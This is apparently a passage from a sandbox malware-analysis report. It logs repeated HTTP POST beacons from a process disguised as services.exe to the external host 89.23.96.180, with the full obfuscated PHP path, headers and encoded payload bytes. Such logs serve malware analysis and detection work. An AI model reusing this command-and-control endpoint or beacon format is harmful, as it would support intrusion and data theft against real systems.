                                                              Dec 21, 2024 10:47:58.043170929 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:58.393548012 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:59.420309067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:59.658010960 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:59 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.5 | 49819 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:59.915047884 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:00.277800083 CET | 2536 | OUT | Data: [encoded request body]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.54982489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:48:00.951884985 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:01.299483061 CET2112OUTData Raw: 5d 56 43 57 58 59 57 50 55 5e 55 5a 54 5e 50 55 57 5c 5c 54 52 52 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCWXYWPU^UZT^PUW\\TRRQV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.0S%=-T>1[./$,.857?&115+7(<.8^>5!_.#Q,2
                                                              Dec 21, 2024 10:48:02.339270115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:02.570477009 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:02 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.5 | 49825 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:01.074760914 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:02.454571009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:02.690433979 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:02 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.5 | 49831 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:02.971949100 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:04.315351963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:04.553910017 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:04 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.5 | 49837 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:04.807739019 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:06.185286999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:06.422095060 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:05 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.5 | 49840 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:06.665671110 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.5 | 49844 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:07.702097893 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2084
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:09.080910921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:09.313863993 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              30 | 192.168.2.5 | 49845 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:07.824152946 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:09.201870918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:09.434000015 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:08 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.5 | 49851 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:09.686455965 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:11.064203024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:11.298074007 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:10 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.5 | 49857 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:11.542387962 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:12.920655012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:13.155210018 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.5 | 49863 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:13.400047064 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.5 | 49864 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:14.467425108 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:15.845374107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:16.081958055 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.5 | 49865 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:14.589155912 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:15.967513084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:16.202322960 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              36  192.168.2.5  49871  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:16.449567080 CET  398  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:16.799633026 CET  2536  OUT
                                                              Dec 21, 2024 10:48:17.829046965 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:18.067035913 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              37  192.168.2.5  49877  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:18.306391001 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:18.658922911 CET  2536  OUT
                                                              Dec 21, 2024 10:48:19.684927940 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:19.921819925 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:19 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              38  192.168.2.5  49883  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:20.164455891 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:20.518322945 CET  2536  OUT


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              39  192.168.2.5  49884  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:21.219162941 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:21.565200090 CET  2112  OUT
                                                              Dec 21, 2024 10:48:22.597081900 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:22.830002069 CET  349  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              40  192.168.2.5  49885  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:21.337713957 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:21.690118074 CET  2536  OUT
                                                              Dec 21, 2024 10:48:22.714060068 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:22.945913076 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              41  192.168.2.5  49891  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:23.182667017 CET  398  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:23.534007072 CET  2536  OUT
                                                              Dec 21, 2024 10:48:24.558446884 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:24.794193983 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:24 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              42  192.168.2.5  49897  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:25.063445091 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:25.409174919 CET  2536  OUT
                                                              Dec 21, 2024 10:48:26.442559958 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:26.678473949 CET  200  IN  HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              43  192.168.2.5  49903  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:26.916299105 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:27.268264055 CET  2536  OUT


                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                              44  192.168.2.5  49905  89.23.96.180  80  1352  C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp  Bytes transferred  Direction  Data
                                                              Dec 21, 2024 10:48:27.951780081 CET  422  OUT  POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:28.299559116 CET  2112  OUT
                                                              Dec 21, 2024 10:48:29.331841946 CET  25  IN  HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:29.566260099 CET  349  IN  HTTP/1.1 200 OK
                                                              Server: nginx
